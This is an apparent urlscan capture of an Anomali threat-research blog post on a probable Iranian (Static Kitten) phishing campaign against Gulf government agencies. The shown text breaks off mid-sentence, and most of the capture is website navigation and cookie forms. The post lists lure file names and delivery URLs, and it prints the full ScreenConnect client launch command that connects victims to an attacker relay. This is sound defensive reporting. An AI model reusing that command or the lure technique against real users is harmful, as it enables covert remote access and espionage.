www.anomali.com
Open in
urlscan Pro
52.17.119.105
Public Scan
URL:
https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-ua...
Submission: On April 24 via manual from US — Scanned from DE
Submission: On April 24 via manual from US — Scanned from DE
Form analysis
4 forms found in the DOMName: email-form — GET
<form id="email-form" name="email-form" data-name="Email Form" method="get" data-wf-page-id="657dc50a96389eee4e83bf78" data-wf-element-id="e1723ccf-20ab-dbed-37ae-2f32b8abc42a" aria-label="Email Form"><select id="languageSelect" name="Language"
data-name="Language" class="w-select"></select></form>
Name: email-form — GET
<form id="email-form" name="email-form" data-name="Email Form" method="get" data-wf-page-id="657dc50a96389eee4e83bf78" data-wf-element-id="f71d4004-5f1a-f0a9-f5b8-1cf1189320cc" aria-label="Email Form"><select id="languageSelect" name="Language"
data-name="Language" class="w-select"></select></form>
Name: wf-form-Cookie-Preferences — GET
<form id="cookie-preferences" name="wf-form-Cookie-Preferences" data-name="Cookie Preferences" method="get" class="fs-cc-prefs_form" data-wf-page-id="657dc50a96389eee4e83bf78" data-wf-element-id="e8a67574-5734-4533-b9a6-d30826116373"
aria-label="Cookie Preferences">
<div fs-cc="close" class="fs-cc-prefs_close">
<div class="fs-cc-prefs_close-icon w-embed"><svg fill="currentColor" aria-hidden="true" focusable="false" viewBox="0 0 16 24">
<path d="M9.414 8l4.293-4.293-1.414-1.414L8 6.586 3.707 2.293 2.293 3.707 6.586 8l-4.293 4.293 1.414 1.414L8 9.414l4.293 4.293 1.414-1.414L9.414 8z"></path>
</svg></div>
</div>
<div class="fs-cc-prefs_content">
<div class="fs-cc-prefs_space-small">
<div class="fs-cc-prefs_title font-family-beatrice">Privacy Preference Center</div>
</div>
<div class="fs-cc-prefs_space-small">
<div class="fs-cc-prefs_text">Our website uses cookies to enhance your experience. Some cookies are essential for basic functionality, while others are used for marketing, analytics, and personalization. You can choose to disable certain types
of storage that are not necessary, but this may affect your website experience.</div>
</div>
<div class="fs-cc-prefs_space-medium"><a fs-cc="deny" href="#" class="fs-cc-prefs_button fs-cc-button-alt w-button">Reject all cookies</a><a fs-cc="allow" href="#" class="fs-cc-prefs_button w-button">Allow all cookies</a></div>
<div class="fs-cc-prefs_space-small">
<div class="fs-cc-prefs_title font-family-beatrice">Manage Consent Preferences by Category</div>
</div>
<div class="fs-cc-prefs_option">
<div class="fs-cc-prefs_toggle-wrapper">
<div class="fs-cc-prefs_label font-family-beatrice">Essential</div>
<div class="fs-cc-prefs_text"><strong>Always Active</strong></div>
</div>
<div class="fs-cc-prefs_text">These are required to enable basic website functionality.</div>
</div>
<div class="fs-cc-prefs_option">
<div class="fs-cc-prefs_toggle-wrapper">
<div class="fs-cc-prefs_label font-family-beatrice">Analytics</div><label class="w-checkbox fs-cc-prefs_checkbox-field"><input type="checkbox" id="analytics" name="Analytics" data-name="Analytics" fs-cc-checkbox="analytics"
class="w-checkbox-input fs-cc-prefs_checkbox"><span for="Analytics" class="fs-cc-prefs_checkbox-label w-form-label">Essential</span>
<div class="fs-cc-prefs_toggle"></div>
</label>
</div>
<div class="fs-cc-prefs_text">These help us understand how the website performs, how visitors interact with the site, and whether there may be technical issues.</div>
</div>
<div class="fs-cc-prefs_option">
<div class="fs-cc-prefs_toggle-wrapper">
<div class="fs-cc-prefs_label font-family-beatrice">Marketing</div><label class="w-checkbox fs-cc-prefs_checkbox-field"><input type="checkbox" id="marketing" name="Marketing" data-name="Marketing" fs-cc-checkbox="marketing"
class="w-checkbox-input fs-cc-prefs_checkbox"><span for="Marketing" class="fs-cc-prefs_checkbox-label w-form-label">Essential</span>
<div class="fs-cc-prefs_toggle"></div>
</label>
</div>
<div class="fs-cc-prefs_text">We use these to deliver advertising that is more relevant to you and your interests. We also use them to limit the number of times you see an advertisement and measure the effectiveness of advertising campaigns.
</div>
</div>
<div class="fs-cc-prefs_option">
<div class="fs-cc-prefs_toggle-wrapper">
<div class="fs-cc-prefs_label font-family-beatrice">Personalization</div><label class="w-checkbox fs-cc-prefs_checkbox-field"><input type="checkbox" id="Personalization" name="Personalization" data-name="Personalization"
fs-cc-checkbox="personalization" class="w-checkbox-input fs-cc-prefs_checkbox"><span for="Personalization" class="fs-cc-prefs_checkbox-label w-form-label">Essential</span>
<div class="fs-cc-prefs_toggle"></div>
</label>
</div>
<div class="fs-cc-prefs_text">These items allow the us to remember choices you make (such as your user name, language, or the region you are in) and provide enhanced, more personal features.</div>
</div>
<div class="fs-cc-prefs_buttons-wrapper"><a fs-cc="submit" href="#" class="fs-cc-prefs_button w-button">Confirm my preferences and close</a></div><input type="submit" data-wait="Please wait..." class="fs-cc-prefs_submit-hide w-button"
value="Submit">
<div class="w-embed">
<style>
/* smooth scrolling on iOS devices */
.fs-cc-prefs_content {
-webkit-overflow-scrolling: touch
}
</style>
</div>
</div>
</form>
Name: wf-form-Cookie-Preferences — GET
<form id="cookie-preferences" name="wf-form-Cookie-Preferences" data-name="Cookie Preferences" method="get" class="fs-cc-prefs_form" data-wf-page-id="657dc50a96389eee4e83bf78" data-wf-element-id="e8a67574-5734-4533-b9a6-d30826116373"
aria-label="Cookie Preferences">
<div fs-cc="close" class="fs-cc-prefs_close">
<div class="fs-cc-prefs_close-icon w-embed"><svg fill="currentColor" aria-hidden="true" focusable="false" viewBox="0 0 16 24">
<path d="M9.414 8l4.293-4.293-1.414-1.414L8 6.586 3.707 2.293 2.293 3.707 6.586 8l-4.293 4.293 1.414 1.414L8 9.414l4.293 4.293 1.414-1.414L9.414 8z"></path>
</svg></div>
</div>
<div class="fs-cc-prefs_content">
<div class="fs-cc-prefs_space-small">
<div class="fs-cc-prefs_title font-family-beatrice">Privacy Preference Center</div>
</div>
<div class="fs-cc-prefs_space-small">
<div class="fs-cc-prefs_text">Our website uses cookies to enhance your experience. Some cookies are essential for basic functionality, while others are used for marketing, analytics, and personalization. You can choose to disable certain types
of storage that are not necessary, but this may affect your website experience.</div>
</div>
<div class="fs-cc-prefs_space-medium"><a fs-cc="deny" href="#" class="fs-cc-prefs_button fs-cc-button-alt w-button">Reject all cookies</a><a fs-cc="allow" href="#" class="fs-cc-prefs_button w-button">Allow all cookies</a></div>
<div class="fs-cc-prefs_space-small">
<div class="fs-cc-prefs_title font-family-beatrice">Manage Consent Preferences by Category</div>
</div>
<div class="fs-cc-prefs_option">
<div class="fs-cc-prefs_toggle-wrapper">
<div class="fs-cc-prefs_label font-family-beatrice">Essential</div>
<div class="fs-cc-prefs_text"><strong>Always Active</strong></div>
</div>
<div class="fs-cc-prefs_text">These are required to enable basic website functionality.</div>
</div>
<div class="fs-cc-prefs_option">
<div class="fs-cc-prefs_toggle-wrapper">
<div class="fs-cc-prefs_label font-family-beatrice">Analytics</div><label class="w-checkbox fs-cc-prefs_checkbox-field"><input type="checkbox" id="analytics" name="Analytics" data-name="Analytics" fs-cc-checkbox="analytics"
class="w-checkbox-input fs-cc-prefs_checkbox"><span for="Analytics" class="fs-cc-prefs_checkbox-label w-form-label">Essential</span>
<div class="fs-cc-prefs_toggle"></div>
</label>
</div>
<div class="fs-cc-prefs_text">These help us understand how the website performs, how visitors interact with the site, and whether there may be technical issues.</div>
</div>
<div class="fs-cc-prefs_option">
<div class="fs-cc-prefs_toggle-wrapper">
<div class="fs-cc-prefs_label font-family-beatrice">Marketing</div><label class="w-checkbox fs-cc-prefs_checkbox-field"><input type="checkbox" id="marketing" name="Marketing" data-name="Marketing" fs-cc-checkbox="marketing"
class="w-checkbox-input fs-cc-prefs_checkbox"><span for="Marketing" class="fs-cc-prefs_checkbox-label w-form-label">Essential</span>
<div class="fs-cc-prefs_toggle"></div>
</label>
</div>
<div class="fs-cc-prefs_text">We use these to deliver advertising that is more relevant to you and your interests. We also use them to limit the number of times you see an advertisement and measure the effectiveness of advertising campaigns.
</div>
</div>
<div class="fs-cc-prefs_option">
<div class="fs-cc-prefs_toggle-wrapper">
<div class="fs-cc-prefs_label font-family-beatrice">Personalization</div><label class="w-checkbox fs-cc-prefs_checkbox-field"><input type="checkbox" id="Personalization" name="Personalization" data-name="Personalization"
fs-cc-checkbox="personalization" class="w-checkbox-input fs-cc-prefs_checkbox"><span for="Personalization" class="fs-cc-prefs_checkbox-label w-form-label">Essential</span>
<div class="fs-cc-prefs_toggle"></div>
</label>
</div>
<div class="fs-cc-prefs_text">These items allow the us to remember choices you make (such as your user name, language, or the region you are in) and provide enhanced, more personal features.</div>
</div>
<div class="fs-cc-prefs_buttons-wrapper"><a fs-cc="submit" href="#" class="fs-cc-prefs_button w-button">Confirm my preferences and close</a></div><input type="submit" data-wait="Please wait..." class="fs-cc-prefs_submit-hide w-button"
value="Submit">
<div class="w-embed">
<style>
/* smooth scrolling on iOS devices */
.fs-cc-prefs_content {
-webkit-overflow-scrolling: touch
}
</style>
</div>
</div>
</form>
Text Content
Discover Blog Support PRODUCTS Marketplace Resources Partners Company LANGUAGE English Español Français Italiano Thank you! Your submission has been received! Oops! Something went wrong while submitting the form. Schedule A Demo Discover PRODUCTS Marketplace Resources Partners Company Discover Blog Support PRODUCTS The Anomali Platform The industry-leading AI-Powered solution elevating your security operations and defense capabilities in one platform. We consolidate your tech stack; give you never before seen speed scale and performance at less cost, empower your team, and help retain them. Simply different. Threat Intelligence Management Anomali Threatstream The external landscape: From data to insights in minutes. Anomali Intelligence Channels Your curated intelligence: Accelerate your time to protection. Detection and Response Anomali Security Analytics Big data security analytics: Threat detection across all of your digital assets at a fraction of the cost. Security Automation Anomali Copilot Immediate, correlated insight: Search petabytes of data in seconds. Integrator Automate response: Transform risk insights into real-time protections. MARKETPLACE The Anomali Marketplace A unique cybersecurity marketplace providing instant access to a growing catalog of threat intelligence providers, integration partners, and threat analysis tools. Marketplace Offerings Threat Intelligence Feeds Trial and purchase threat intelligence feeds from Anomali partners – find the right intelligence for your organization, industry, geography, threat type, and more. Threat Analysis Tools and Enrichments Gain the tools to pivot quickly from one piece of information to look up other sources of data to get a complete picture of a threat – all one click away. For Partners Security System Partners Anomali seamlessly integrates with many Security and IT systems to operationalize threat intelligence.cost. Marketplace for Partners The Anomali Technology Partner Program provides technology partners everything they need to develop innovative and differentiated product and service integrations that complement Anomali’s solution portfolio designed to stop breaches and attackers. RESOURCES Libraries Resources Upcoming and on-demand webinars, brochures and datasheets, industry reports and white papers, case studies, and more. Events Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt amet Detect LIVE Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt amet AI Automation What is Security Analytics? What is SOAR? What is Threat Exposure Management? Security Analytics What is Security Analytics? What is SOAR? What is Threat Exposure Management? What is Threat Detection, Investigation, and Response? Threat Intelligence What is Threat Intelligence? Threat Intelligence Sharing What is a Threat Intelligence Platform? What is a Cyber Fusion Center? Security Frameworks What Are STIX/TAXII? What is MITRE ATTACK? PARTNERS Sell Anomali Anomali offers compelling margins, competitive partner support, and new revenue opportunities for partners looking to help their customers boost the efficacy of security infrastructure, improve security visibility and automate operations while saving costs Partners Overview Integrate with Anomali We believe that creating and investing in an ecosystem of technology partners is imperative in delivering better business outcomes for our customers. Sharing threat intelligence and insights across ISACs, ISAOs, and other communities also depend on this collaboration. Join the Technology Partner Program Anomali SDKs Threat Intel Sharing Partner Portal The Anomali Partner Portal is a place to register new sales opportunities and access Anomali resources. Partner Program COMPANY About Us Anomali is the leader in modernizing security operations with the power of analytics, intelligence, automation, and AI to deliver breakthrough levels of visibility, threat detection and response, and cyber exposure management. Leadership Careers Press Room Awards Reviews Contact Us Schedule a Demo Products The Anomali Platform The industry-leading AI-Powered solution elevating your security operations and defense capabilities in one platform. We consolidate your tech stack; give you never before seen speed scale and performance at less cost, empower your team, and help retain them. Simply different. Security Automation Anomali Copilot Immediate, correlated insight: Search petabytes of data in seconds. Integrator Automate response: Transform risk insights into real-time protections. Detection and Response Anomali Security Analytics Big data security analytics: Threat detection across all of your digital assets at a fraction of the cost. Threat Intelligence Management Anomali ThreatStream The external landscape: From data to insights in minutes. Anomali Intelligence Channels Your curated intelligence: Accelerate your time to protection. Marketplace The Anomali Marketplace A unique cybersecurity marketplace providing instant access to a growing catalog of threat intelligence providers, integration partners, and threat analysis tools. Marketplace Offerings Threat Intelligence Feeds Trial and purchase threat intelligence feeds from Anomali partners – find the right intelligence for your organization, industry, geography, threat type, and more. Threat Analysis Tools and Enrichments Gain the tools to pivot quickly from one piece of information to look up other sources of data to get a complete picture of a threat – all one click away. For Partners Security System Partners Anomali seamlessly integrates with many Security and IT systems to operationalize threat intelligence.cost. Marketplace for Partners The Anomali Technology Partner Program provides technology partners everything they need to develop innovative and differentiated product and service integrations that complement Anomali’s solution portfolio designed to stop breaches and attackers. Resources Libraries Resources Upcoming and on-demand webinars, brochures and datasheets, industry reports and white papers, case studies, and more. Events Join Anomali for any of our online or in-person events throughout the year to learn how we can help you achieve your cyber security goals. We'd love to see you online or in-person! AI Automation What is Copilot? Threat Intelligence What is Threat Intelligence? Threat Intelligence Sharing What is a Threat Intelligence Platform? What is a Cyber Fusion Center? Security Analytics What is Security Analytics? What is SOAR? What is Threat Exposure Management? What is Threat Detection, Investigation, and Response? The Evolution and Future of SIEM Security Frameworks What Are STIX/TAXII? What is MITRE ATTACK? Free Tools STAXX STAXX gives you an easy way to access any STIX/TAXII feed. Partners Sell Anomali Anomali offers compelling margins, competitive partner support, and new revenue opportunities for partners looking to help their customers boost the efficacy of security infrastructure, improve security visibility and automate operations while saving costs. Partners Overview Integrate with Anomali We believe that creating and investing in an ecosystem of technology partners is imperative in delivering better business outcomes for our customers. Sharing threat intelligence and insights across ISACs, ISAOs, and other communities also depend on this collaboration. Join the Technology Partner Program Anomali SDKs Threat Intel Sharing Partner Portal The Anomali Partner Portal is a place to register new sales opportunities and access Anomali resources. Partner Program Company About Us Anomali is a revolutionary AI-Powered Security Operations Platform that is the first and only solution to bring together security operations and defense capabilities into one proprietary cloud-native big data solution. Leadership Careers Press Room Reviews Awards Contact Us Schedule a Demo Schedule A Demo en English Español Français Italiano Discover PRODUCTS Marketplace Resources Partners Company Blog Support LANGUAGE English Español Français Italiano Thank you! Your submission has been received! Oops! Something went wrong while submitting the form. Schedule Demo Discover PRODUCTS Marketplace Resources Partners Company Discover Blog Support The Anomali Platform Transform security operations with disruptive security analytics. Go from business risk to cyber actions in minutes. Amplify your visibility, automate your workflows, and optimize your cyber stack. Do more. With less. Learn More BACK TO MENU Exposure Management ATTACK SURFACE MANAGEMENT Your risk surface: Where are you at risk of exposure? DIGITAL RISK PROTECTION Your compromise: What have the attackers already taken from you? Threat Intelligence Management Threatstream The external landscape: From data to insights in minutes. Anomali Intelligence Channels Your curated intelligence: Accelerate your time to protection. Detection and Response MATCH Big data security analytics: Threat detection across all of your digital assets at a fraction of the cost. Security Automation copilot Immediate, correlated insight: Search petabytes of data in seconds. Lens Automate intel gathering: Extract intelligence insights from unstructured data. Integrator Automate response: Transform risk insights into real-time protections. The Anomali Marketplace A unique cybersecurity marketplace providing instant access to a growing catalog of threat intelligence providers, integration partners, and threat analysis tools. Learn More BACK TO MENU Marketplace Offerings Threat Intelligence Feeds Trial and purchase threat intelligence feeds from Anomali partners – find the right intelligence for your organization, industry, geography, threat type, and more. Threat Analysis Tools & Enrichments Gain the tools to pivot quickly from one piece of information to look up other sources of data to get a complete picture of a threat – all one click away. Security System Partners Anomali seamlessly integrates with many Security and IT systems to operationalize threat intelligence. For Partners Marketplace for Partners The Anomali Technology Partner Program provides technology partners everything they need to develop innovative and differentiated product and service integrations that complement Anomali’s solution portfolio designed to stop breaches and attackers. Resources Upcoming and on-demand webinars, brochures and datasheets, industry reports and white papers, case studies, and more. Browse Library BACK TO MENU Threat Intelligence what is threat intelligence? THREAT INTELLIGENCE SHARING WHAT IS A THREAT INTELLIGENCE PLATFORM (TIP)? WHAT IS A CYBER FUSION CENTER? Analytics what is SECURITY ANALYTICS? WHAT IS SOAR? What is Threat Exposure Management? What is Threat Detection, Investigation, and Response? The Evolution and Future of SIEM Security Frameworks WHAT ARE STIX/TAXII? WHAT IS MITRE ATTACK? Free Tools Anomali Cyber Watch A weekly intelligence digest from Anomali Threat Research. STAXX STAXX gives you an easy way to access any STIX/TAXII feed. The Anomali Newsletter Get a monthly summary of Anomali threat intelligence content, research, news, events, and more. Sell Anomali Anomali offers compelling margins, competitive partner support, and new revenue opportunities for partners looking to help their customers boost the efficacy of security infrastructure, improve security visibility and automate operations while saving costs Partners Overview BACK TO MENU Integrate with Anomali We believe that creating and investing in an ecosystem of technology partners is imperative in delivering better business outcomes for our customers. Sharing threat intelligence and insights across ISACs, ISAOs, and other communities also depend on this collaboration. Join the Technology Partner Program Anomali SDKs Threat Intel Sharing Partner Portal The Anomali Partner Portal is a place to register new sales opportunities and access Anomali resources. Partner Portal Login About Anomali Anomali is the leader in modernizing security operations with the power of analytics, intelligence, automation, and AI to deliver breakthrough levels of visibility, threat detection and response, and cyber exposure management. Learn More BACK TO MENU Anomali at Work Anomali Press room Events Detect Live Leadership Reviews Awards Get in Touch Contact US Request a Demo Careers Products The Anomali Platform Transform security operations with disruptive security analytics. Go from business risk to cyber actions in minutes. Amplify your visibility, automate your workflows, and optimize your cyber stack. Do more. With less. Exposure Management Attack Surface Management Your risk surface: Where are you at risk of exposure? Digital Risk Protection Your compromise: What have the attackers already taken from you? Threat Intelligence Management ThreatStream The external landscape: From data to insights in minutes. Anomali Intelligence Channels Your curated intelligence: Accelerate your time to protection. Detection and Response Anomali Security Analytics Big data security analytics: Threat detection across all of your digital assets at a fraction of the cost. Security Automation Copilot Immediate, correlated insight: Search petabytes of data in seconds. Lens Automate intel gathering: Extract intelligence insights from unstructured data. Integrator Automate response: Transform risk insights into real-time protections. Marketplace The Anomali Marketplace A unique cybersecurity marketplace providing instant access to a growing catalog of threat intelligence providers, integration partners, and threat analysis tools. Learn More MARKETPLACE OFFERINGS Threat Intelligence Feeds Trial and purchase threat intelligence feeds from Anomali partners – find the right intelligence for your organization, industry, geography, threat type, and more. Threat Analysis Tools & Enrichments Gain the tools to pivot quickly from one piece of information to look up other sources of data to get a complete picture of a threat – all one click away. FOR PARTNERS Security System Partners Anomali seamlessly integrates with many Security and IT systems to operationalize threat intelligence.cost. Marketplace for Partners The Anomali Technology Partner Program provides technology partners everything they need to develop innovative and differentiated product and service integrations that complement Anomali’s solution portfolio designed to stop breaches and attackers. Resources Resources Upcoming and on-demand webinars, brochures and datasheets, industry reports and white papers, case studies, and more. Browse Library THREAT INTELLIGENCE What is Threat Intelligence? Threat Intelligence Sharing What is a Threat Intelligence Platform (TIP)? What is a Cyber Fusion Center? ANALYTICS What is Security Analytics? What is SOAR? What is Threat Exposure Management? What is Threat Detection, Investigation, and Response? The Evolution and Future of SIEM security FRAMEWORKS What Are STIX/TAXII? What is MITRE ATTACK? FREE TOOLS Anomali Cyber Watch A weekly intelligence digest from Anomali Threat Research. STAXX STAXX gives you an easy way to access any STIX/TAXII feed. The Anomali Newsletter Get a monthly summary of Anomali threat intelligence content, research, news, events, and more. Partners Sell Anomali Anomali offers compelling margins, competitive partner support, and new revenue opportunities for partners looking to help their customers boost the efficacy of security infrastructure, improve security visibility and automate operations while saving costs Partners Overview INTEGRATE WITH ANOMALI We believe that creating and investing in an ecosystem of technology partners is imperative in delivering better business outcomes for our customers. Sharing threat intelligence and insights across ISACs, ISAOs, and other communities also depend on this collaboration. Join the Technology Partner Program Anomali SDKs Threat Intel Sharing Partner PORTAL The Anomali Partner Portal is a place to register new sales opportunities and access Anomali resources. Partner Program Company About Anomali Anomali is the leader in modernizing security operations with the power of analytics, intelligence, automation, and AI to deliver breakthrough levels of visibility, threat detection and response, and cyber exposure management. Learn More ANOMALI AT WORK Anomali Press Room Events Detect LIVE Leadership Reviews Awards GET IN TOUCH Contact Us Request a Demo Careers Schedule Demo en English Español Français Italiano February 10, 2021 - Anomali Threat Research , PROBABLE IRANIAN CYBER ACTORS, STATIC KITTEN, CONDUCTING CYBERESPIONAGE CAMPAIGN TARGETING UAE AND KUWAIT GOVERNMENT AGENCIES Research <h3>ScreenConnect Remote Access Tool Utilizing Ministry of Foreign Affairs-Themed EXEs and URLs</h3> <p><em>Authored by: Gage Mele, Winston Marydasan, and Yury Polozov</em></p> <h2>Key Findings</h2> <ul> <li>Anomali Threat Research identified a campaign targeting government agencies in the United Arab Emirates (UAE) and likely the broader Middle East.</li> <li>We assess with medium confidence that the activity is being conducted by Iran-nexus cyberespionage group Static Kitten, due to Israeli geopolitical-themed lures, Ministry of Foreign Affairs (MOFA) references, and the use of file-storage service Onehub that was attributed to their previous campaign known as Operation Quicksand.<sup>[1]</sup></li> <li>The objective of this activity is to install a remote management tool called ScreenConnect (acquired by ConnectWise 2015) with unique launch parameters that have custom properties.</li> <li>Malicious executables and URLs used in this campaign are masquerading as the Ministry of Foreign Affairs (MOFA) of Kuwait (mofa.gov[.]kw).</li> <li>Another sample, including only MOFA (mfa.gov), could be used for broader government targeting.</li> </ul> <h2>Overview</h2> <p>Anomali Threat Research has uncovered malicious activity very likely attributed to the Iran-nexus cyberespionage group, Static Kitten (Seedworm, MERCURY, Temp.Zagros, POWERSTATS, NTSTATS, MuddyWater), which is known to target numerous sectors primarily located in the Middle East.<sup>[2]</sup> This new campaign, which uses tactics, techniques, and procedures (TTPs) consistent with previous Static Kitten activity, uses ScreenConnect launch parameters designed to target any MOFA with <strong>mfa[.]gov</strong> as part of the custom field. We found samples specifically masquerading as the Kuwaiti government and the UAE National Council respectively, based on references in the malicious samples.</p> <p>In mid-2020, the UAE and Israel began the process of normalizing relations. Since then, tensions have further escalated in the region, as reported by numerous sources. The targeting of Kuwait could be tied to multiple factors, including Kuwait’s MOFA making a public statement that they were willing to lead mediation between Iran and Saudi Arabia.<sup>[3]</sup> Furthermore, in October 2020, trade numbers for a peace deal between Israel and UAE included an estimate for the creation of 15,000 jobs and $2 billion in revenue on each side.<sup>[4]</sup> In that same month, Static Kitten reportedly conducted Operation Quicksand, which targeted prominent Israeli organizations and included the use of file-storage service OneHub.<sup>[5]</sup></p> <h2>Details</h2> <p>We identified two lure ZIP files being used by Static Kitten designed to trick users into downloading a purported report on relations between Arab countries and Israel, or a file relating to scholarships. The URLs distributed through these phishing emails direct recipients to the intended file storage location on Onehub, a legitimate service known to be used by Static Kitten for nefarious purposes.[6] Anomali Threat Research has identified that Static Kitten is continuing to use Onehub to host a file containing ScreenConnect.</p> <p>The delivery URLs found to be part of this campaign are:</p> <ul> <li>ws.onehub[.]com/files/7w1372el</li> <li>ws.onehub[.]com/files/94otjyvd</li> </ul> <p>File names in this campaign include:</p> <ul> <li>تحليل ودراسة تطبيع العلاقات الدول العربية واسرائيل httpsmod[.]gov.kw.ZIP</li> <li>تحليل ودراسة تطبيع العلاقات الدول العربية واسرائيل httpsmod[.]gov.kw.exe</li> <li>الدراسیة .zip</li> <li>الدراسیة .exe</li> <li>مشروع .docx</li> </ul> <p>Translated file names</p> <ul> <li>Analysis and study of the normalization of relations between the Arab countries and Israel httpsmod.gov.kw.zip</li> <li>Analysis and study of the normalization of relations between the Arab countries and Israel httpsmod.gov.kw.exe</li> <li>Scholarships.zip</li> <li>Scholarships.exe</li> <li>Project.docx</li> </ul> <p>Static Kitten’s objective is to direct users to a downloader URL (<strong>ws.onehub[.]com/files/7w1372el</strong> which downloads a ZIP file) via a phishing email that impersonates an EXE (<strong>تحليل ودراسة تطبيع العلاقات الدول العربية واسرائيل httpsmod[.]gov.kw.exe</strong>). This EXE purports to be a report on Arabic countries and Israel relations but, when executed, actually launches the installation process for ScreenConnect.</p> <p>A similar second sample uses .docx file that tries to direct users to <strong>ws.onehub[.]com/files/94otjyvd</strong> which downloads a ZIP file called <strong>لدراسیة .zip</strong>. An EXE inside the ZIP of the same name will also begin the ScreenConnect installation process when executed. An overview of the infection chain is shown in Figure 1below.</p> <p style="text-align: center;"><em><strong><img alt="Static Kitten Campaign Infection Chain" src="https://cdn.filestackcontent.com/qoDoJNyyRbmVT4P2Ordu"/><br/> Figure 1</strong> - Static Kitten Campaign Infection Chain</em></p> <h3>Lure Document Analysis</h3> <p>Static Kitten is distributing at least two URLs that deliver two different ZIP files that are themed to be relevant to government agency employees. The URLs are distributed through phishing emails with lure and decoy documents. An example lure is shown in Figure 2 below.</p> <p style="text-align: center;"><em><strong><img alt="Static Kitten Lure Document" src="https://cdn.filestackcontent.com/9taUbRQcTcGEQYAYxR1i"/><br/> Figure 2</strong> – Static Kitten Lure Document .docx</em></p> <p>The .docx file shown in Figure 2 directly refers to government agency recipients while highlighting concerns about recent Iranian actions, the impact of the US elections, and joint studies by government entities on relations between Arabic countries and Israel. The actors reference multiple official agencies, including the General Secretariat of the Cooperation Council for the Arab States of the Gulf and the UAE National Media Council, likely in an effort to add the appearance of legitimacy. A full translation of this document can be viewed in Appendix A. The hyperlink in the .docx file is impersonating the UAE National Media Council, however, the actual link directs to <strong>ws.onehub.com/files/7w1372el</strong>.</p> <p>The second file is a ZIP called الدراسیة .zip (see Figure 3). We cannot determine the delivery method for this ZIP, but it is likely similar to the .docx email delivery method of the first download URL. The geopolitical-themed ZIP contains an EXE file with the same name that begins the installation process for ScreenConnect when executed (see Figure 4).</p> <p style="text-align: center;"><em><strong><img alt="Download URL ws.onehub.com/files/94otjyvd for Malicious ZIP الدراسیة .zip" src="https://cdn.filestackcontent.com/JSr3TyJBQJisFMwSeyTa"/><br/> Figure 3</strong> – Download URL <strong>ws.onehub.com/files/94otjyvd</strong> for Malicious ZIP <strong>الدراسیة .zip</strong></em></p> <p style="text-align: center;"><em><strong><img alt="ScreenConnect Installation" src="https://cdn.filestackcontent.com/HLvJBIh5Tp6JP05cEbNw"/><br/> Figure 4</strong> - ScreenConnect Installation</em></p> <h2>Technical Analysis</h2> <h3>ScreenConnect and OneHub Context</h3> <p>Between 2016 and 2020, we have seenScreenConnect and Onehub used in malicious cyber activity by different, unassociated threat actors. For example, between 2016 and 2019 unknown threat actors targeted IT outsourcing firms, including compromising US-based Cognizant and India-based Wipro.<sup>[7]</sup> The actors responsible for these attacks used ScreenConnect to connect to endpoints on client networks, enabling them to conduct further lateral movements and automated actions on objectives. During an incident impacting Cognizant and their client Maritz Holdings, actors used ScreenConnect to propagate to other connected systems and caused over $1.8 million (USD) in losses through a gift card fraud scheme.<sup>[6]</sup> In 2019, another threat group used ConnectWise to execute PowerShell commands in their target environments. This lead to the delivery of Zeppelin and other VegaLocker ransomware variants, Vidar information stealer, Cobalt Strike beacons, PS2EXE tools, and banker Trojans.[7] In 2020, ScreenConnect/ConnectWise has been utilized by the cybercriminal group Pinchy Spider (GOLD SOUTHFIELD, GOLD GARDEN, Sodinokibi, REvil, GandCrab) to distribute Sodinokibi ransomware.<sup>[8]</sup></p> <p>Remote desktop management software is a common target and tool used by threat actors because of the wide variety of functionalities they offer. ScreenConnect offers three primary functions that each contain different valuable features for threat actors. ScreenConnect’s capabilities are shown in Table 1 below.</p> <p style="text-align: center;"><em><strong>Table 1</strong> - ScreenConnect Capabilities</em><sup>[9]</sup></p> <table class="table table-striped"> <thead> <tr> <th>Feature</th> <th>Functions</th> </tr> </thead> <tbody> <tr> <td>Remote Support</td> <td>Remote control and viewing of any internet-connect device.</td> </tr> <tr> <td>Unattended Access</td> <td>Persistent connection allows behind-the-scenes, remote control of any machine or server.</td> </tr> <tr> <td>Meetings</td> <td>Standard screen-sharing meetings with chat and voice communication, record video, and take screenshots.</td> </tr> </tbody> </table> <p>The cybercriminal group Graceful Spider (TA505, Gold Evergreen, TEMP.Warlock, Hive0065, Chimborazo, FIN11) distributed spearphishing emails impersonating Onehub in 2019 in attempts to trick users into downloading the SDBbot remote access trojan (RAT).[10] Onehub’s file-storage services are also utilized in malspam emails to host various malware, as is common with other file storage locations abused by multiple threat actors.</p> <h3>First Executable</h3> <p>تحليل ودراسة تطبيع العلاقات الدول العربية واسرائيل httpsmod.gov.kw.exe</p> <p>When a user tries to double click the executable <strong>تحليل ودراسة تطبيع العلاقات الدول العربية واسرائيل httpsmod.gov.kw.exe</strong> (Screenconnect payload), it drops the Microsoft installer file. This begins the installation of the client payload onto victim machines. While the actors attempted to make the installation appear legitimate, closer inspection of the client launch parameters reveals the potential for broader MOFA targeting. The client service launch parameters are:</p> <div class="break-word"> <p>"C:\Program Files (x86)\ScreenConnect Client (a97eeae2330a1851)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=instance-uwct38-relay.screenconnect.com&p=443&s=defc756e-8027-47b6-b67f-400b5152b0f9&k=BgIAAACkAABSU0ExAAgAAAEAAQAtuFTxmBL02KmPrJD46iRMPemIxmEf5ugjlUMfa193CjLMeH9pna2eM0ZGHYhe3MZHUEAByA4fhpInP5kKnkrPl%2fjhxwjHSIaKZ%2bMobL27iSLf8tgmCtGJTTZndViJcMcp4v0yqJOMxVuUdPraZ%2fTvrw6wZpECq7LCGncZGOri%2fqQVFUqsIDZZzhQye6zfkCg0DgxxPf4aQzjgqQo20dJeQDIEEb0sy7FPiSde3VVxTmp%2fMB3Ho%2bK3mobu743glaeTOq0aIsvXASRKb5xB1f4pFUMi1mETUoGgWL%2f6qhNk65scRZmECWvs7O8ajulQMiSPQj9lUOejdBR9taEB8Byz&t=&c=mofa&c=mofa.gov.kw&c=mofa&c=pc&c=&c=&c=&c="</p> </div> <p>While the ScreenConnectclient agent is being installed, the server component expects a connection and the server can identify the client agent through a public key thumbprint. The thumbprint is a 16 character string located at "C:\Program Files (x86)\ScreenConnect Client (<strong>a97eeae2330a1851</strong>)”</p> <p>Analysis of the authentic launch parameters passed back to the server as part of Screenconnect functionality is shown in Table 2 below.</p> <p style="text-align: center;"><em><strong>Table 2 </strong>- ScreenConnect Launch 